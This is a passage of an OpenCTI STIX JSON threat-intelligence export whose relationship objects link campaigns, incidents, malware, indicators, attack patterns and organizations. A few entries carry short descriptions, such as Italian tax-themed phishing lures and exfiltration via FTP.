"x_opencti_target_ref": "identity--bb0a97dc-ae81-4c5e-9b56-3add2a980977",
"created": "2020-02-04T15:19:15.017Z",
"modified": "2020-02-04T15:19:15.017Z",
"x_opencti_first_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "24401885-fef3-425a-b65b-6857589ce2e6",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--efa9ef88-96e7-43ed-95ce-52c2d23b617d",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"target_ref": "identity--433d071c-42e4-41fa-915e-bad5a7473bd1",
"x_opencti_source_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"x_opencti_target_ref": "identity--433d071c-42e4-41fa-915e-bad5a7473bd1",
"created": "2020-02-04T15:27:55.998Z",
"modified": "2020-02-04T15:27:55.998Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "dfb7c972-509e-4f3b-a5c5-2dfb902810d9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5df6632a-63b8-4e12-befc-32f74cf0c0bc",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"created": "2020-02-04T15:47:40.326Z",
"modified": "2020-02-04T15:47:40.326Z",
"x_opencti_first_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "15242c25-8906-4223-9b28-b60fe66bd6ae",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--ce6959d6-e046-4bf7-96c7-1fd974c5ee8b",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--f6ab57d7-06b3-4980-b6d0-8a4364eb5dd4",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--f6ab57d7-06b3-4980-b6d0-8a4364eb5dd4",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:28.764Z",
"modified": "2020-02-05T10:05:28.764Z",
"x_opencti_first_seen": "2020-02-05T10:05:28.764Z",
"x_opencti_last_seen": "2020-02-05T10:05:28.764Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6a9b457c-fe5b-4bbd-8512-9c4d8e1ac78b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f89b7a83-518c-4711-b1a1-3b4632f6e91c",
"type": "relationship",
"relationship_type": "uses",
"description": "On October 29, Proofpoint researchers observed dozens of emails attempting to deliver malicious Microsoft Word attachments with Italian lures impersonating the Agenzia Entrate, the Italian Ministry\nof Taxation.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"created": "2020-01-07T14:36:27.227Z",
"modified": "2020-01-07T14:36:27.227Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "e93b149f-8532-4104-808f-454bfc583011",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--f4e9424b-417e-486b-81f3-e411f3fe779f",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"target_ref": "malware--b03a728b-69c3-4734-a50e-94517938c419",
"x_opencti_source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"x_opencti_target_ref": "malware--b03a728b-69c3-4734-a50e-94517938c419",
"created": "2020-02-04T14:49:20.367Z",
"modified": "2020-02-04T14:49:20.367Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-17T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7e14df5c-c74d-401f-83e8-c39e29fb3111",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--bd07e2f9-0e97-469d-825c-14f68d77c55f",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:18:21.629Z",
"modified": "2020-02-04T15:18:21.629Z",
"x_opencti_first_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2243b128-141d-45b2-8c9e-e5a17558b66a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--3dcf9dd6-93c4-48ab-9828-b8bf7246b666",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-01-08T16:07:00.847Z",
"modified": "2020-01-08T16:07:00.847Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "c9bec55b-20ea-4008-9566-37c9eb278b0d",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--1630916b-cfe9-4f25-b96f-8694d5aa2bfa",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-01-08T16:11:47.079Z",
"modified": "2020-01-08T16:11:47.079Z",
"x_opencti_first_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "1ce495c3-e564-443e-bb60-719858aa05e9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--02611de8-57da-42c4-a07f-b34b35ee599c",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"created": "2020-02-04T15:26:17.407Z",
"modified": "2020-02-04T15:26:17.407Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "0f956e4d-6967-4157-9e31-c76e8c738bf2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--fad9e08f-fa22-4e36-9eec-1d3e099a99be",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"target_ref": "identity--65463837-a41a-4b61-a074-b2f20f097555",
"x_opencti_source_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"x_opencti_target_ref": "identity--65463837-a41a-4b61-a074-b2f20f097555",
"created": "2020-02-04T15:40:57.452Z",
"modified": "2020-02-04T15:40:57.452Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "185a4784-933c-4dbb-9430-443bf8b3e41c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--288794bd-993d-452b-b4ef-8e2c0239e772",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"created": "2020-02-04T15:43:58.932Z",
"modified": "2020-02-04T15:43:58.932Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5cd25a3b-801f-4882-a385-7b0e862e3dd0",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--ba8e9eeb-0e52-4e91-a5cc-6a1782d0056c",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"target_ref": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"x_opencti_source_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"x_opencti_target_ref": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"created": "2020-02-04T16:03:20.289Z",
"modified": "2020-02-04T16:03:20.289Z",
"x_opencti_first_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_last_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "9d19c35e-1aea-4fc0-9b5d-f2110d313a7b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--b57a8b86-24ef-433a-b7c7-c262e4345961",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--48e335bc-734e-4bcb-b364-f24407be5ece",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--48e335bc-734e-4bcb-b364-f24407be5ece",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:51.204Z",
"modified": "2020-02-05T10:04:51.204Z",
"x_opencti_first_seen": "2020-02-05T10:04:51.204Z",
"x_opencti_last_seen": "2020-02-05T10:04:51.204Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "0ae19019-5918-45ff-ba41-eb90e0d1a040",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--b2f5fb87-7e50-484f-8232-9f65c10b0058",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--2deec89a-2cf2-47b8-9fae-89a456d834d5",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--2deec89a-2cf2-47b8-9fae-89a456d834d5",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:56.941Z",
"modified": "2020-02-05T10:04:56.941Z",
"x_opencti_first_seen": "2020-02-05T10:04:56.941Z",
"x_opencti_last_seen": "2020-02-05T10:04:56.941Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f91780d9-0343-4afb-a958-9d4f33e8ba24",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--d9fbecb8-530b-400d-a0f1-be1821f62e7e",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--dc5ead57-a56d-4a7c-b477-bf33c5828615",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--dc5ead57-a56d-4a7c-b477-bf33c5828615",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:02.842Z",
"modified": "2020-02-05T10:05:02.842Z",
"x_opencti_first_seen": "2020-02-05T10:05:02.842Z",
"x_opencti_last_seen": "2020-02-05T10:05:02.842Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "47d655f0-37a1-4f88-9422-1815d03dcea5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--e0ee6084-d4e6-4d01-9eb5-50ef1b975b79",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--8477d190-01fa-42d0-8c25-c6cb7b62e42a",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--8477d190-01fa-42d0-8c25-c6cb7b62e42a",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:09.027Z",
"modified": "2020-02-05T10:05:09.027Z",
"x_opencti_first_seen": "2020-02-05T10:05:09.027Z",
"x_opencti_last_seen": "2020-02-05T10:05:09.027Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ed925c59-4aa6-474d-bad4-a75a26ff0d34",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--9bdc2b8e-c0c7-4a19-bf1f-1859d0e6a7c3",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--20d5c6ac-ef7d-4cac-a941-104719daf80d",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--20d5c6ac-ef7d-4cac-a941-104719daf80d",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:22.144Z",
"modified": "2020-02-05T10:06:22.144Z",
"x_opencti_first_seen": "2020-02-05T10:06:22.144Z",
"x_opencti_last_seen": "2020-02-05T10:06:22.144Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "96afe29a-c34c-47e9-9971-25c4c68e922e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--0246b8d2-73ea-48fd-a888-b2afce788f1a",
"type": "relationship",
"relationship_type": "uses",
"description": "Delivered by spearsphishing attachment.",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"created": "2020-02-04T14:42:54.683Z",
"modified": "2020-02-04T14:42:54.683Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ffa10d8d-537b-40ac-a815-3833a6088277",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9757781f-2322-4a4e-8651-64a6e883c538",
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
"x_opencti_id": "13cfffc3-1a9e-3c61-9316-0df2bbd23390",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:56:35.000Z",
"x_opencti_modified": "2019-04-15T16:56:35.000Z"
},
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--ce8eab1f-1c4d-4c3c-9cbd-1dc6ea25d566",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-07T14:32:51.314Z",
"modified": "2020-01-07T14:32:51.314Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ba4e7881-4f7c-46cf-9898-4b2e92e88da8",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--33799534-2e54-4b00-bbf6-32be6359f7a6",
"type": "relationship",
"relationship_type": "uses",
"description": "exfiltration via FTP.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"created": "2020-02-04T14:57:37.084Z",
"modified": "2020-02-04T14:57:37.084Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "23b8a103-328c-4709-8b89-bcd576854631",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
]
},
{
"id": "relationship--4e67bf72-02fc-4f09-808c-550c6112f3f0",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"target_ref": "identity--9dc270f2-416f-40aa-865a-cbf6e87a04a9",
"x_opencti_source_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"x_opencti_target_ref": "identity--9dc270f2-416f-40aa-865a-cbf6e87a04a9",
"created": "2020-02-04T15:07:27.882Z",
"modified": "2020-02-04T15:07:27.882Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ec754648-ac4e-4f95-9b50-09b40d94211f",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--560ff6cf-b17e-4672-9e9f-64527f411396",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"target_ref": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"x_opencti_source_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"x_opencti_target_ref": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"created": "2020-02-04T15:07:35.222Z",
"modified": "2020-02-04T15:07:35.222Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2cc2bcf8-ffff-4ee8-ad31-f62585c3d120",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--2de7b0c0-65d2-4c33-ad51-6de4d96e8c82",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"target_ref": "identity--f0e37b7a-93e9-4884-ac16-84cbcc1f0a2f",
"x_opencti_source_ref": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"x_opencti_target_ref": "identity--f0e37b7a-93e9-4884-ac16-84cbcc1f0a2f",
"created": "2020-02-04T15:17:40.349Z",
"modified": "2020-02-04T15:17:40.349Z",
"x_opencti_first_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "39ab5370-01de-4430-868e-7c9ae3feafbd",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--a842a8f3-1a46-4c2f-86c6-0730f826123b",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"created": "2020-02-04T15:19:59.638Z",
"modified": "2020-02-04T15:19:59.638Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "e644110c-4987-4d02-be42-7a9baf26151a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--50550e47-fedd-4360-9e33-f76af5be17ac",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"target_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"x_opencti_source_ref": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"x_opencti_target_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"created": "2020-01-08T16:05:38.889Z",
"modified": "2020-01-08T16:05:38.889Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "985c6abd-5fc7-408c-834d-adfd0dcbe7cb",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--df0e4c16-3729-4704-86d5-5aa4ae9f151a",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:44:50.252Z",
"modified": "2020-02-04T15:44:50.252Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "838bc34a-4372-4aee-8c3d-a1cb15e3e651",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--2dcab7ee-67a3-4d56-9eb0-ccea4ca67591",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--5b4eca1f-a30c-420c-845a-4f089934dcf2",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--5b4eca1f-a30c-420c-845a-4f089934dcf2",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:00:21.726Z",
"modified": "2020-02-05T10:00:21.726Z",
"x_opencti_first_seen": "2020-02-05T10:00:21.726Z",
"x_opencti_last_seen": "2020-02-05T10:00:21.726Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "1bba2fa9-17d0-4a77-a010-ecfef60e4990",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--553397d5-0d5c-4d77-a679-9013acf11eb1",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--dcaa1087-87d2-410a-83aa-90c936afe3e4",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--dcaa1087-87d2-410a-83aa-90c936afe3e4",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:31.690Z",
"modified": "2020-02-05T10:05:31.690Z",
"x_opencti_first_seen": "2020-02-05T10:05:31.690Z",
"x_opencti_last_seen": "2020-02-05T10:05:31.690Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7a52f2c1-5e9b-43c4-acc9-045bd9576fe7",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--7f190cdd-4c24-4197-8e19-de7a43cb4d69",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--cd96e384-82b5-409f-8984-afc26a55e1c0",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--cd96e384-82b5-409f-8984-afc26a55e1c0",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:16.342Z",
"modified": "2020-02-05T10:06:16.342Z",
"x_opencti_first_seen": "2020-02-05T10:06:16.342Z",
"x_opencti_last_seen": "2020-02-05T10:06:16.342Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "4142c887-0f39-4521-8971-c5373deada6a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5b0a8c1c-6265-42f3-84f0-e486dc3af97c",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-01-07T14:38:42.064Z",
"modified": "2020-01-07T14:38:42.064Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
